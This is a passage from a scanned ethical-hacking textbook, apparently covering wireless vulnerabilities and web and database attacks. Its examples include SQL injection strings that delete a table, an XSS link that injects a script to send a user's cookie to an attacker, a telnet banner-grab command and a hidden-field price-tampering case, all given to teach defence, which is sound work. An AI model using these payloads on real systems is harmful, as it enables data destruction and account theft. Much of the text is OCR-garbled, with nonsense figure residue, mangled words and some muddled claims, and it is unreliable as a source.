subject to little or no security* leading to unrestricted access by any party that locates
the AR

A new twist on rogue APs adds an element of phishing. In this attack, an attacker
creates a rogue AP with a name that looks the same or is the same as a legitimate AP
with the intention that unsuspecting users will attach to it. Once users attach to this
AP, their credentials can be captured by the attacker. By using the same method, an
attacker can even capture sensitive data as it is transmitted over the network.

Promiscuous Clients

Promiscuous clients are APs that are configured to offer strong signals and the offer
of good performance. The idea behind these types of APs is that a victim will notice the
AP and how strong the signal is and how good the performance is, and then attach to it.
When these APs are nearby, they may be owned by an attacker who has the same goals
as the malicious owner of a rogue AP: to capture information .

202 PART 2 A Technical Overview of Hacking

Wireless Network Viruses

Viruses e\tsl thai Lite speciiicalh designed in Leverage
the strengths and weaknesses of wireless technologies.
Wireless viruses are different because they can replicate
quickly using the wireless network, jumping from system
to system with relative ease. For example, a virus known
as MVW-WIFI can replicate through wireless networks
by using one system to detect other nearby wireless
networks: it then replicates to those networks, at which
poinl the process repeats.

Protection on a wireless network is Eihsolutely essential to consider and consider carefully.
There are several techniques that you may use to protect yourself and your employees
from harm, these include:

Firewalls — In the case of roaming or remote clients that connect to wireless
networks at the office or at the local coffee shop or airport , a good personal firewall
can provide a much needed level of protection.

• Antivirus — An antivirus should be installed on every computer, and a wireless
client is no exception, especially due to its higher exposure to threats.
• VPN — A virtual private network can enhance protection to a high degree

• by encrypting all traffic between the roaming client and the company network.
By using this technique it is possible to work on a wireless network that has
no protection itself and provide this through the VPN.

Wireless Hacking Tools

There are a number of wireless hacking tools available to the attacker who wants
lu break into or discover wireless nei works. Some ol the more common ones include;

• Kismet
• Ketstumbler

• Medieval Bluetooth Scanner

• inSSlDer

• Core impact

• CFI LA Ng u a rd K et work S ec u rity Scan ner

• Cow patty

• Wireshark

• NOTE

While wireless viruses are restricted
to 802.11 networks, they can and
have appeared on other wireless
technologies, including Bluetooth
devices. In concept, 502.11 viruses
and Bluetooth are the same, but the
difference in practice is how they
use their underlying technologies
(wireless or Bluetooth).

Countermeasures

CHAPTER 8 Wireless Vulnerabilities

203

J 0 g£ Q t>^[f|i( “>^f«^ ^

1 1

l;s :

ham? Ch=n

-i

Type,

r

*Jz ^ n-

~i 1 —

SNFU |

Lt a sraiDs

QMD22DkC8CCF

NpCai

ID

Agc-it (Lurerlj Gnnaco

AP

-S3

1 1. J

17

® 00501 DffHIW

TP.-

3

Ago-Je (luaifVQ WavhLAN

AP

WTP

‘7!

-1W

M

OR*

3

■^n: ic :Lmj3wH) Cwhjes

*P

WEP

^7)

in

2?

B

AP

V*CP

•79

■m

£1

1

.— r-ii.

AP

W£P

•a?

■ io

1}

lfc|iXD82SA3J93B

&

Lmkiyt

AP

V^EP

-71

ILJ

n

1

Agw* QjKWl) Orinoco

AP

-MTP

-es

-inn

i?

rWC?Q?

£

CST(Uiksys.]

AP

-SB

-iti

NoCai-Setoe*i«H>l

114

AP

41

•i

1

Rawly

r

Not xmr]

FIGURE 8-1

Netstumbler interface.

Netstumbler

Netstumbler is one of the more common tools ibr locating wireless
networks of the 8 G2. 11 persuasion. The software is designed to detect any
wireless network that your wireless network adapter supports (802. 1 1 n.
802,11b, 8()2.11g, and so on). The software also has the ability to interface
with a OSR global positioning system (CPS) to map out the location of the
APs it detects, usually within a good distance of the actual AP. Netstumbler
does not have many options and is very simple to use (see Figure 8-1).

inSSIDer

While Netstumbler software offers a good amount of functionality, it is not the
only product that can perform wireless network scanning. Another piece of software
that can do the same thing is inSSIDer. Metageek. the makers of inSSIDer, describe
the benefits of their tool as follows.

NOTE

Netstumbler alio comes
in a version known as
mini-stumbfer, designed
especially for PDAs.

204 PART 2 A Technical Overview of Hacking

Features unique to inSSlDer include:

• Uses Windows Vista and Windows XP 64 -bit

• Uses the Native Wi-Fi application protocol interface (API) and current
wireless network card

indicator (RSJ5I), and “Time Last Seen”

• Compatible with most GPS devices (NMEA v2.3 and higher}

The inSSlDer tool can do the following:

• Inspect your WLAN and surrounding networks
to troubles hoot competing APs

Tnk’k i he strength oJ received signals in dRm
(a measurement of decibels) over time

• Filter APs in an easy-to-use format
• Highlight APs for areas with high Wi-Fi concentration

• Export Wi-Fi and GPS data to a Keyhole Markup
Language (KML) file to view in Google Earth

• ^ NOTE

Netsturnbler has been a staple of
ward riving techniques for awhile,
but for all its popularity it does
have some limitations, one of
which is a lack of 64-bit support.
The inSSlDer tool is a full featured
replacement for Netst urn bier.

E3 .,i

I irtSSIDrr

frit £ew ti^to
(7) MAC Acid phi

or

Metsfraek

ICS 31 PM

3.03 3T PN

afl8 3tPM

C

3 02 3U3 3CH 3 OS 3 36 107 3

1 M ( 5 5 M JIMI 1213

FIGURE 8 2

The inSSlDer interface

CHAPTER 8 Wireless Vulnerabilities

205

The inSSlDer interface is shown in Figure 8-2.

Once a target has been identified and Us identifying in format ion noted,
the a Mack can begin.

Protecting Wireless Networks

Wireless networks can be secured if care is taken and knowledge
of the vulnerabilities is possessed by the security professional.
In some ways a wireless network can be secured like a wired
network, but there are techniques specific to wireless networks
that must be considered as welL

Default AP Security

Every AP ships with certain defaults already set; these should
always be changed. Every manufacturer includes some guidance on
what to configure on its APs; this advice should always be followed
and mixed with a healthy dose of experience in what is best. Not
changing the defaults on an AP can be a big detriment to security
because the defaults tire generally posted on the manufacturer’s
Web site.

Placement

Placement of a wireless AP can be a potent security measure if undertaken properly.
An AP should be placed to cover the areas it needs to, and not as much of the ones
it doesn’t. For example, an AP should not be located near a window if the people
that will be connecting to it are deeper inside the building or only in the building.
Positioning an AP near a window gives the signal more distance to emanate outside
the building.

Of course, other issues with placement need to be addressed, in particular the
issue of interference. Placement of APs near sources of electromagnetic interference
(EMI) can lead to unusable or unavailable APs, EMI can lead to APs being available
to clients, but with such poor performance that it makes the technology worthless
to the organization.

Emanations

Not much can be done about emanations in wireless network, but there is something
that can be done to control the scope and range of these emanations. In some cases,
wireless directional antennas can be used to concentrate or focus the signal tightly
into a certain area instead of letting it go everywhere. One type of antenna is the Yagi
antenna, which can focus a signal into a narrow beam, making it difficult to pick up
by others outside the select area.

^NOTE

Using a piece of software
such as Netstumbler can
discover APs, When one is
detected, it is easy to look at
the name of the AP and infer
that whoever didn’t change
the name from something
probably didn’t do anything
else, either.

206 PA RT 2 A Tech nical Overview of H ack i ng

Rogue APs

Rogue APs are somewhat tough to stop, but they can be detected and deterred.

The first action to address with rogue APs is the installation of unauthorized ones

by employees. In this case h education is the first line of defense: let employees know that

installation oi rogue APs is not allowed and why. Additionally, perform site surveys using

tools such as Netstumbler, Kismet, or any number of commercial wireless site survey

packages to detect rogue APs.

The second issue to deal with is individuals connecting to the wrong or to
unauthorized APs. In these cases education is again key. Let employees know the
names of company-controlled APs and give them information about the dangers
of connecting to unknown APs,

Use Protection for Transmitted Data

By its very nature, wireless data is transmitted so that anyone who wants to listen in can
do so. In order to protect wireless networks an appropriate authentication technology
should be used. The three that are currently in use are:

• Wired Equivalent Privacy (WEP) — Mot much used anymore because it is weak
and only marginally better than no protection at all. WEP was available on all
first-generation wireless networks, but w r as replaced later with stronger technologies
such as WPA.

In theory, WEP was supposed to provide protection, hut in practice poor implemen-
tation resulted in the use of weak keys. It was found that with enough weak keys
simple cryptanalysis could be performed, and a W r EP passphrase can now be broken
in a few minutes (sometimes 30 seconds).

costs due to its well-known
weaknesses. Using an
alternative method such as

WEP is listed here in the
interest of completeness:
however, in practice WEP
should be avoided at all

NOTE

Wi-Fi Protected Access (WPA) — More robust than WEE
it was designed to replace it in new r networks. WPA introduces
stronger encryption and better key management that makes
for a stronger system.

WPA is supported on most wireless APs manufactured
after 2003, and some manufactured prior to this can have
their firmware upgraded. WPA should be used if the AP
offers the ability to use WEP or WPA,

WPA or WPA2 would be
much more secure.

Wi-Fi Protected Access version 2 (WPA2) — WPA 2 is

an upgrade to WPA that introduces slronger encryption
and eliminates a few T of the remaining weaknesses in WPA,

CHAPTER 8 Wireless Vulnerabilities

207

Using the appropriate protection for a wireless network is important because it can
protect the network from eavesdropping and other attacks in which Lin at Lacker can see
network traffic. Of course, just having a good protection scheme does not make for a safe
environment by itself; there are other factors. In the case of WPA and WPA2, the keys
in use make a major difference for how effective the technology is. Using poorly chosen
or short passwords (or keys) can weaken the protection and make
it breakable by a knowledgeable attacker. When choosing a key
it should be random, be of sufficient length, and adhere to the rules

MAC Filtering

Media access control (MAC) address filtering is a way to enforce
access control on a wireless network by registering the MAC
addresses of wireless clients with the A P. Because the MAC address is
supposed to be unique, clients are limited to those systems that have
their MAC p reregistered. To set up MAC filtering you need to record
the MAC addresses of each client that will use your AP and register
those clients on the AR

NOTE

While MAC filtering does
provide a level of protection,
a determined attacker
can get past it with some
knowledge of how networks
work, it is also very difficult
to use in all but the smallest
environments, as managing
MAC lists can become very
cumbersome.

PTER SUMMARY

Wireless communication and networking are technologies that have seen rapid
growth and ad option over the past lew years. Many organisations have chosen to
use wireless tedmototnes due to the increased mobility mid ijbUily lo ex let id networks
thai wireless offers. Wireless has become one of the most widely used technologies
by both consumers and businesses, and will most likely continue to be so.

For all the benefits that wireless offers, the big concern for the security professional
is security. Wireless technologies have many security issues, both real and potential,
that must be addressed by the security professional. The technology suffers from
poor or even overlooked security options by those who either Lid opted the technology
too quickly or didn’t take the lime to understand the issues.

This chapter explored how to use wireless technology m an organization, reaping
its benefits and doing so securely, Like any technology, wireless can be used safely;
it is only a matter of understanding the tools available lo make the system secure.
To make wireless secure, you can leverage techniques such as encryption and
authentication together with other features designed to make the system stronger
and more LippeLiiiny lo the business.

20S

PART 2 A Technical Overview of Hacking

4l

KEY CONCEPTS AND TERMS

802.11

Bluebugging

Bluejacking

Sluesnarfing

Multiple input and multiple
output (Ml MO)

Personal Area Met working (PAN)

Preshared key (PSK)

Wi-Fi

Wireless local area network
(WLAM)

CHAPTER 8 ASSESSMENT

1 . Wireless refers to all the technologies that
juake u [i 1H)±. ] E .

A. True

B. False

1. operates at 5 Ghz.

A. ml Ala

B. 802.11b
C 802. llg
11 802.11ii

is a short range wireless technology.

1. Which type of network requires an AP?

A, Infrastructure
<_\ Peer-to-peer
I), Uk’nt Server

5.

dlctate(s| the performance

of a wireless network.

A. Clients

E. Interference

C APs

Jl All of the above

6.

. blocks systems based on

A, MAC Filtering
E. Authentication

C Association
D. WEP

1. An Lid hoe network scales well in production
environments.

A. True

B. False

1. Which of the following Is used to Identify
a wireless network?

A. SS1D
E. IBSS

C. Key

11 Frequency

1. Several APs group together form a(n)

A. BSS

B. SS1D

C BBSS

D. FBS

10.

uses trusted devices.

A. S02.ll

B. Infrared

C. Bluetooth

D. CSMA

Web and Database Attacks

TODAY THE PUBLIC FACE of just about every organization is its Web site.
Companies host all sorts of content on their servers with the intent that
their customers or potential customers will be able to find out more
about their products and services. A Web site is the first point of contact for
customers and also an attractive target for an attacker. With a well-placed attack,
an individual with an ax to grind can embarrass a company by defacing its
Web site or even by stealing information.

As a security professional, one of the tasks you will be charged with is
safeguarding this asset and the infrastructure that is attached to it. Defending
a Web server will require special care and knowledge to make the information
and content available, but at the same time protect it from unnecessary exposure
to threats. This task is trickier than it sounds because a balance has to be struck
between making the content accessible to the appropriate audience while at
the same time ensuring that it is secure. In addition, the Web server cannot
be considered a standalone entity, because it will usually be attached to the
organization’s own network, meaning threats against the server can flow over
into the company network as well

Making the situation more complex is the fact that Web servers may host
not only regular Web pages but also Web applications and databases. More and
more organizations are looking to Web services such as streaming video and
Web applications such as SharePoint to make a more dynamic experience for
their clients. Also, organizations are hosting ever- in creasing amounts of content
such as databases online for a wide range of reasons. Each of these situations
represents another detail that the security professional must address properly
to make sure that the server and the organization itself are safe and secure.

In this chapter you will learn how to deal with the issues revolving around
Web servers, Web applications, and databases. The issues involved are a diverse
group, but they can be properly dealt with if due care is exercised.

Chapter 9 Topics

This chapter covers the following topics and concepts:

• What attacking Web servers is
What examining an SQL injection is
• What vandalizing Web servers is
What database vulnerabilities are

• Chapter 9 Goals

When you complete this chapter, you will be able to:

• List the issues facing Web servers
• Discuss issues threatening Web applications

• List the vulnerabilities of Web servers

• List the vulnerabilities of Web applications

• List the challenges that face a webmaster

• Describe how to deface Web sites

• Describe how to enumerate Web services

• Describe how to attack Web applications

• Describe the nature of buffer overflows

• Describe the nature of input validation

• List the methods of denial of service against Web sites

• Describe SQL injections

• Attacking Web Servers

One of the popular targets tor attack is the Web server and its content. An attacker
wanting to cause an organization grief can attack a server and steal information,
vandalize a sile. disrupt services, or even cause a public relations nightmare for an
organization. Consider the fact that the Web server is the public face that customers
and clients quite often see first, so the security of the server and llie sites contained
on it becomes even more of an issue to the security professional.

CHAPTER 9 Web and Database Attacks

211

Before going too far look at Web servers through the eyes of the three classes
of individuals who will be interacting or concerned with the health and wellbeing
of the Web server:

Server administrator — Concerned with the security of the server because it can
provide an easy means of getting into the local network. It is not unlikely to have a
Web server act as the entry point into the network for malicious code such as viruses,
worms, Trojans, and rootkits. For server administrators, the problem becomes even
more of a challenge because Web servers have become increasingly complex and
feature-rich, with unknown or undocumented opiums that are left un ad dressed.

Network administrator — Concerned with the fallout from the problems the server
administrator may introduce or overlook. These security problems can lead to holes
that can be exploited to gain access to the company netivork and the services therein.
These administrators are aware that a Web server needs to be usable by the public
and therefore accessible to the masses, but at the same time to be secure (which can
be in conflict with the former goal).

■ End user — The individual who will work with the server the most to access content
and services. Regular users just want to browse to a site and access their desired
content; they do not think about things like Java and ActiveX and the very real
security threats they may be introducing to their system. Making this more of an
issue is the simple fact that the Web browser they are using to access this content
can allow threats to bypass their or the company’s firewall and have a free ride into
the internal network.

Categories of Risk

Risks inherent with Web servers can typically be broken into three categories, each
of which will be examined in more detail. Each of the categories of risk can be matched
to the environments in which each of the users operates:

Defects and misc on figuration risks — Risks in this cute gory include the ability
to steal information from a server, run scripts or exec u tables remotely, enumerate
servers, and carry out denial of service (DoS) attacks. Attacks in this space are
generally associated with the types of attacks a server administrator or webmaster
would encounter.

Browser- and network -based risks — Risks of this type include an
attacker capturing network traffic between the client (W r eb browser)
and server.

Browser or client side risks — In this category are risks that affect
the user’s system directly, such as crashing the browser, stealing
information, infecting the system, or having some impact on
the system,

w

NOTE

Misconfiguration also
covers the act of server
default configurations
in place.

212 PART 2 A Technical Overview of Hacking

Vulnerabilities of Web Servers

Web servers have a lot of the same vulnerabilities as any other servers — plus all
the vulnerabilities associated with hosting content. Web servers can be the only face
of companies that have no traditional locations (for example, Amazon and eBay),
So yon must have a thorough understanding of the vulnerabilities that are present
in this medium.

Improper or Poor Web Design

A potentially dangerous vulnerability seen in Web site design is what you aren’t supposed
to see. Specifically, the comments and hidden tags that tire placed in a Web page by the
Web designer. These items aren’t designed to be displayed in the browser, but a savvy
attacker can observe these items by viewing the source code of the page:

<f oxm method=” pos t ” action= ” . . / . – /cgi -bin/f ormMai I . pi “>
< ‘ – – Regular FormMa i I options – –■->

<input type=hidden name = ” recipient” value= n sojiieone@s one place . com” ?

<input type=hidden name = ” sub ject ” val ue=”Mes 5 age from website visitor”^

<input type=hidden name = ” required 11 val ue= n Name , Emai 1 1 Address 1 „City , State , Zip , Phone 1 “>

<input type=hidden name=”redirect ” val ue=”ht tp :/ /www t someplace . com/received , htm”>

<input type=h idden name = ” server name 11 value= n ht tps : //payments . somep I ace . conT’>

<input type=hidden name= ” env_repor t 11 value= r, REMQTE_HOST t HTTP_USER_AGENT'”>

<input type=hidden name= ” ti t le 11 val ue= 11 Form Results’ r >

<input type=h idden name = ” r eturn_link_url ‘ value=”http : //www . somep lace . com/mai n , html “>

<input type=h idden name = ” r eturn_l ink_ti tie’ value=”Back to Main Page “>

<input type=hidden name=”missing_f ields_redirect” va lue = ” h t tp : //www , somep I ace . com/
error . html ” >

<input type=hidden name= “order conf irmat ion” value= H orders@somep lace . com”>

<input type=hidden name=”cc” val ue=” j , halak@somep!ace . com’ r >

<input type=h idden name = “bcc” val ue= 1! c , pr ice@someplace . com “>

< ! — Courtesy Reply Options – ->

When looking at the code, there is some information that is useful to an attacker.
While the information may not be completely actionable as far as something that can
be attacked it does give us something. In the code notice the presence of e-mail addresses
and even the presence of what appears to be a payment processing server [https://
panments.someplace.com). This is information that an attacker may use to target
an attack.

CHAPTER 9 Web and Database Attacks

213

The following is another ex el m pie of a vulnerability in code that can be exploited:

<FORM ACTION -http://ll 1 . 1 1 1 . 1 1 1 . 1 11/cgi- bin/order .pi 11 method= ,l post ”
<input type-hidden- name- “price” valLte= M GO©0 . 00″>
<input type=hidden name=”prd_id” value=”Xl90″>

QUANTITY: <i nput type=text name=”quan t ” size=3 max length=3 value=1>

In this ex ei m pie. the Web designer has decided to use hidden fields
to hold the price of an item. Unscrupulous attackers could change
the price of the item from $6,000.00 to$60. £10 and make their
own discount.

Buffer Overflow

A common vulnerability in Web servers, and all software t is the
buffer overflow. A buffer overflow occurs when an application,
process, or program attempts to put more data in a buffer than
it was designed to hold. In practice, buffers should hold only
a specific amount of data and no more. In the case of a buffer
overflow, a programmer, either through lazy coding or other
practices, creates a buffer in code, but does not put restrictions on
it. Much like too much water poured into an ice cube tray, the delta
must go someplace, which in this case means adjacent buffers.
When data spills or overflows into the buffers it was not intended
for, the result can be corrupted or overwritten data. In practice
if this act occurs, the result can be that data loses its integrity.
In extreme cases, buffer overwriting can lead to anything from
a loss of system Integrity to the disclosure of in form Eit ion to
unauthorized parties.

NOTE

thing to have in code; in fact,
to have when developing an
application and should be
retained in the original source
code. Code that is published into
a public area such as a Web site
removed or sanitized.

NOTE

Buffer overflows are not
exclusive to Web servers, Web
applications, or any application;
they can be encountered in any
piece of code that you may use.

Denial of Service (DoS) Attack

An attack that can wreak havoc with a Web server is the venerable DoS attack. As a fixed
asset, a Web server is vulnerable to this attack much as any other server-based asset would
he. When carried out against a Web server, all the resources on a Web server can be rapidly
consumed, slowing down the performance of a server. A Do$is mostly considered an annoyance due to the ease at which it can be defeated. Distributed Denial of Service (DDoS) Attack Where a DoS attack is mostly an annoyance, the distributed denial of service (DDoS) attack is much more of a problem. A DDoS accomplishes the same goal as a DoS: to consume all the resources on a server and prevent it from being used by legitimate users. The different between a DDoS and a DoS is scale, using the concept of economy of scale. In a DDoS. many more systems are used to attack a target, crushing it under the weigh t of multiple requests at once. In some cases, the attack can he launched from thousands of servers at once against a target 214 PART 2 A Technical Overview of Hacking Some of the more common DDoS attacks Include: NOTE Ping flooding attack — A computer sends a ping to another system with the intention of uncovering information about the system, This attack can be scaled up so that the p tickets being sent to a target will force the system to go offline or suffer slowdowns. • Smurf attack -Similar to the ping ilood attEick, but with a twist to the process. In a Smurf attack, a ping command is sent to an intermediate network where it is amplified and forw T arded to the victim. This single ping now becomes a virtual tsunami of traffic. SYN flooding — The equivalent of sending a letter that requires a return receipt; however, the return address is bogus. If a return receipt is required and the return address is bogus, the receipt will go nowhere, and a system waiting for confirmation wili be left in limbo for some period of time. An attacker that sends enough SYN requests to a system can use all the connections on a system so that nothing else can get through. IP fragmentation/fragmentation attack — Re quires an attacker to use advanced knowledge of the Transmission Control Protocol/Internet Protocol (TCP/IP) suite to break packets up into “fragments” that can bypass most intrusion-detection systems, In extreme cases, this type of attack can cause hangs, lock-ups, reboots, blue screens, and other mischief. When you make a request for content to a Web server, a piece of information known as a content location header is prefixed to the response. With most Web servers this header provides information such as IP address, fully qualified domain name (FQDN), and other data. Banner Information A banner can reveal a wealth of information about a Web server for those who know how to retrieve it. Using a piece of software such as Telnet or PuTTY, it is possible to retrieve this information about a server. What’s in a banner? The following code illustrates what is returned from a banner: HTTP/ 1.1 200 OK Server: <web server name and version> Con tent -Location: http: / / 192 . 1G3 . 100. 100/index .htm Date: Wed, 12 May 2010 14:03:52 GMT Content -Type : text/html Atcept-Ranges : bytes Last-Modified; Wed, 12 May 26 1 0 18:56:06 GMT ETag ; “067dl36a639bel : ISbG” Con tent -Length : 4325 CHAPTER 9 Web and Database Attacks 215 This header, which is easy to obtain, reveals information Eibout the server that is being targeted, Web servers can have this in form at ion sanitized, but the webmaster must actually make the effort to do so, This information can be returned quite easily from a Web server using the following command: telnet www . <servername> . com 80 Permissions Permissions control access to the server and the content on it. but the problem is they can easily be incorrectly configured. Incorrectly assigned permissions have the potential to allow access to locations on the Web server that should not be accessible. Error Messages While they might not seem like a problem, error messages can be a potential vulnerability as well giving vital information to an attacker Error messages like 4fl4 for example, tell a visitor that content is not available or located on the server. However there are plenty of other error messages that can be gwen each given different types of informal Ion from the very detailed to the very obscure. Table 9-1 displays error messages that may be displayed in a Web browser or Web application when a connection is attempted to a Web server or service. The messages in Table 9-1 come directly from Microsoft’s d eve I o pine n t d at ah a se. Unnecessary Features Servers should be purpose-built to the role they will fill in the organisation; anything not essential to this role should be eliminated, This process, known as hardening, will get rid of the features, services, and applications that are not necessary for the system to do its appointed job. NOTE Banners can be changed in most Web servers to varying degrees to meet the designer or developer’s goats. You should become familiar with your Web application or server to see what you can configure and what is practical to do. MOTE Permissions should always be carefully assigned, configured, and managed. Even better, permissions should always be documented to ensure that the proper ones are in pEace. Error messages should be configured to be descriptive when doing development and testing, but when deployed into a production environment they should be sanitized. I NOTE Everything that is running on a system — such as a service, application, or process — is running something that can be targeted and exploited by an attacker. 216 PART 2 A Technical Overview of Hacking table 9-1 Partial ist of IIS 6,0 messages. MESSAGE NUMBER DESCRIPTION 400 Cannot resolve the request. 401.1 Unauthorized; Access is denied due to invalid credentials. 401-2 Unauthorized; Access is denied due to server configuration favoring an alternate authentication method. 1 Unauthorized; Access is denied due to an ACL set on the requested resource. 401.4 Unauthorized; Authorization failed by a filter installed on the Web server. 401.5 Unauthorized: Authorization failed by an ISAPI/CGI application. 401-7 Unauthorized; Access denied by URL authorization policy on the Web server. 403 Forbidden: Access is denied. 403.1 Forbidden: Execute access is denied. 403.2 Forbidden: Read access is denied. 403.3 Forbidden: Write access is denied. 403.4 Forbidden: SSL is required to view this resource. 403.5 Forbidden: SSL 128 is required to view this resource. 403.6 Forbidden: IP address of the client has been rejected. 403.7 Forbidden: SSL client certificate is required. 403.8 Forbidden: DNS name of the client is rejected. 403.9 Forbidden: Too many clients are trying to connect to the Web server. 403.10 Forbidden: Web server is configured to deny Execute access. 403.11 Forbidden: Password has been changed, TIP Remember that discovering the default accounts in an operating system or environment is very easy because the system vendor generally has these details listed on its Web site. User Accounts Most operating systems come precon figured wtlh a number of user accounts and groups already in place. These accounts can easily be discovered through a little research on an attacker’s part. These accounts can be used to gain access to the system in ways that can be used for no good. CHAPTER 9 Web and Database Attacks 217 Structured Query Language (SQL) Injections Structured Query Language (SQL) injections are designed to exploit applications that solicit the client to supply data that Is processed in the form of SQL statements. An attacker forces the SQL engine into executing commands unintended by the creator by supplying specially crafted input. These commands force the application to reveal information that is restricted. • SQL injections are an exploit in which ihe attacker “injects” SQL code into an input box or form with the goal of gaining unauthorized access or alter data. • Can be used to inject SQL commands to exploit non-validated input vulnerabilities in a Web app database. • Can be used to execute arbitrary SQL commands through a Web application. • Examining an SQL Injection SQL injections require considerable skill to execute, but the effects can be dramatic. Simply put. SQL injections are designed to exploit “holes H in the application. If an attacker has the appropriate knowledge of the SQL language such an attack can yield a tremendous amount of access to the database on the Web site and the Web applications that rely on it. So what are the tools you will need to perform an SQL injection? Not much in the scheme of things: ■ Web browser • Knowledge of SQL • Lack of input validation • The environment and platform affected can be: ■ Language — SQL ■ Platform — Any SQL injections are common and serious issues with any Web site that uses a database as its brick end. Those with the correcl know led tit 1 can easily lieleet and exploh Iknv.s, Since a large of Web sites use databases as their back end to provide a rich experience to the visitor the potential for a Web site to be effected by this attack is possible on even small-scale sites. Essentially an SQL in lection Is carried out by placing special characters into existing SQL commands and modifying the behavior to achieve the attacker’s desired result. NOTE Structured Query Language (SQL) is a language used to interact with databases. Using SQL it is possible to access, manipulate and change data in databases to differing degrees. The language is not designed for any specific vendor’s database, though some vendor’s have added their own customization, and is commonly used in large database systems. NOTE To be effective, an SQL injection does require a level of knowledge and comfort with the SQL language, However, browsers such as Mozilla Firefox do offer add-ons that make the level of knowledge less than it used to be. Other plugins that are available can assist in the process of locating weaknesses in a Web site or Web application giving the attacker the ability to target their attack. 218 PART 2 A Technical Overview of Hacking The following example illustrates an SQL injection in action and how it is carried out. This example also illustrates the impact of introducing different values into an SQL query. In the following example, after an attacker with the usernamc ”kirk M inputs the string 1 name” ; DELETE FROM items;— “for item Name, then the query becomes the following two queries: SELECT T FROM items WHERE owner = ‘kirk’ AND itemname = * name ‘ ; DELETE FROM items; — ‘ Several of the well known database products such as Microsoft’s SOI. Server and Seine! allow multiple SQL statements separated by semicolons to be executed at once. This technique is formally known as batch execution and allows an attacker to execute multiple arbitrary commands attains! a daiabase. In other databases this technique will generate an error and fail, so knowing the database you are attacking is essential. If an attacker enters the string ‘name’ ; DELETE FROM items; SELECT * FROM items WHERE ‘ a ‘ = * a ‘ ; . the following three valid statements will be created: SELECT * FROM items WHERE owner = r kirk’ AMD itemname = ‘name’ ; DELETE FROM items ; SELECT * FROM items WHERE ‘a’-‘a 1 ; A good way to prevent SQL injection attacks is to use input validation, which ensures that only approved characters are accepted. Use whitelists, w r hich dictate safe characters, and blacklists, which dictate unsafe characters. Vandalizing Web Servers Web servers are the targets of numerous types of attacks, but one of the most common attacks is the act of vandalism known as defacement. Defacing a Web site can be aggressive or very subtle, depending on the goals of the attacker, but in either case the goals are the same: to embarrass the company, make a statement, or just be a nuisance. In order to actually deface a Web site, it is possible to use a number of methods, depending on the attacker’s own skill level, capabilities, and opportunities available. Any of the following methods may be used: 1 (|>TIP Take special note of the last two characters, which are two hyphens (- -}. These characters are significant as they tell the database to treat everything following as a comment and therefore not executable. In the event that this query was modified,, anything in the original query following the hyphens would now be ignored and everything p?ior would be executed. CHAPTER 9 Web and Database Attacks 219 • Cr eden tials th rou g h m ei n -in -th e- m iddle art a c ks • Password brute force Administrator account • FTP server exploits • Web server bugs • Web folders • I nco rre c tly ass igned or configured per m issio n s • SQL injection I KL poisoning • We b ser ver exte n sion ex plo it s • Rem ote ser vice exploi 1 s • Let’s take a look at some of the more common ways of attacking a Web server and the sites hosted on them. Input Validation Developers of Web applications have traditionally been less than careful regarding the type of input Ibey will accept. In most cases, a user entering data into n I’orm or Web site will have few if any restrictions placed up on them when he or she enters data. When data is accepted without restriction, mistakes both intentional and unintentional will be entered into the system and can lead to problems later on, such as the following: • System crashes • Database manipulation • Database corruption • Buffer overflows • Inconsistent data • A good example of input validation, or rather the lack of it, is a box on a form where a phone number is to be entered, but actually any form of data will be accepted. In some cases, taking the wrong data will simply mean that the information may be unusable to the owner of the site* but it could cause the site to crash or mishandle the information to reveal information onscreen. Cross-Site Scripting (XSS) Another type of attack against a Web server is the cross-site scripting (XSS) attack. It relies on a variation of the input validation attack* but the target is different because the goal is to go after a user instead of the application or data. An example of a XSS uses scripting methods to execute a Trojan with a target’s Web browser; this would be made possible through the use of scripting Languages such as JavaScript or VBScript. By careful analysis, an attacker can look for ways la inject malicious code into Web pages in order io gain information from session info on the browser, to elevated access, to content in the browser. NOTE Always ask what type of data you are expecting in an application, (such as a form) and make sure that this is the only type of data that is accepted. 220 PA RT 2 A Tech n i ea I Overview of H ack i n g XSS in Action 1. The attacker discovers that the HYRULE Web site suffers from a XSS scripting defect. • An attacker sends an e-mail stating that the victim has just been awarded a prize and should collect it by clicking a link in the e-mail. • The link in the e-mail goes to http://www.hyruIe.com/dBfault.3sp7namEs <5Cnpt>badgoa(0<Jscript>. • When the link is clicked, the Web site displays the message “Welcome Back! ” with a prompt to enter the name. • The Web site has been read the name from your browser via the link in the e-mail. When the link was clicked in the e-mail r the HYRULE Web site was told your name is <script>evi I Script ()</script>. • The Web server reports the “name” and returns it to the victim’s browser. • The browser correctly interprets this as script and runs the script. • This script nstructs the browser to send a cookie containing some information to the attacker’s system, which it does. • Most modern Web browsers contain protection, against XSS, but this does not mean the user is entirely safe. Anatomy of Web Applications Web applications have become more popular in recent years, with companies deploying more of this class of software application. Applications such as Microsoft ShiircPoim . Moodle h and others have been deployed for all sorts of reasons, ranging from organization of tin hi Lo simplilied customer access. Appllrul ions in l his cmegory Eire typically ik-siiiiu-u to be accessed from a Web browser or similar client application that uses the HTTP protocol to exchange information between the client and server Software in this category can be written in any number of development languages, including Java or ActiveX. Web applications can be constructed with a variety of appli- cation platform s h such as BE A Web logic, ColdFusion, IBM WebSphere, Microsoft .NET, and Sun JAVA technologies. Exploitative behaviors: • Theft of information such as credit cards or other sensitive data • The ability to update application and site content • Server-side scripting exploits • Buffer overflows • Domain Name Server (DNS) attacks • Destruction of data • CHAPTER 9 Web and Database Attacks Making Web applications even more of a concern to the security professional is the fact that many Web applications are dependent on a database. Web appiicalions will hold information such as configu ration information, business rules and logic, and customer data. Using attacks such as SQL injections, an attacker can compromise a Web application <uu1 i lien reveal or mmiipukue daua in ivays that an owner ma\ not have envisioned, much less intended. Common vulnerabilities with Web applications tend to be somewhat specific to the environment, including factors sueh as operating system, Explication, and user base. With all these factors in mind, it can be said that Web application vulnerabilities can be roughly confined to the following categories: • Authentication issues • Authorization configuration • Session management issues • Input validation • Encryption strength and implementation • Environment- specific problems • Insecure Logon Systems If ti Web application requires a user to log on prior to gaining access to the information in an application, this logon must be handled securely. An application that handles logons must be designed to properly handle invalid logons and passwords. Care must be taken that the incorrect or improper entry of information does not reveal information that an attacker could use to gain additional information about a system. An example of this situation is shown in Figure 9- ] . Applications can track Information relating to improper or incorrect logons by users if so enabled, Typically, this information comes in log form with entries listing items such iis: • Entry of an invalid user ID with a valid password • Entry of an valid user ID with an invalid password • Entry of an invalid user ID and password • Applications should be designed to return very generic information that does not reveal information such as correct usernames. W f eb apps that return message such as “uscrnnme invalid” or “password invalid” can give an attacker a target to focus on — such as a correct password. This user is not active. Contact your iyst&m administrator. Revealing error message. L_ Return to Login page 222 PART 2 A Technical Overview of Hacking One tool 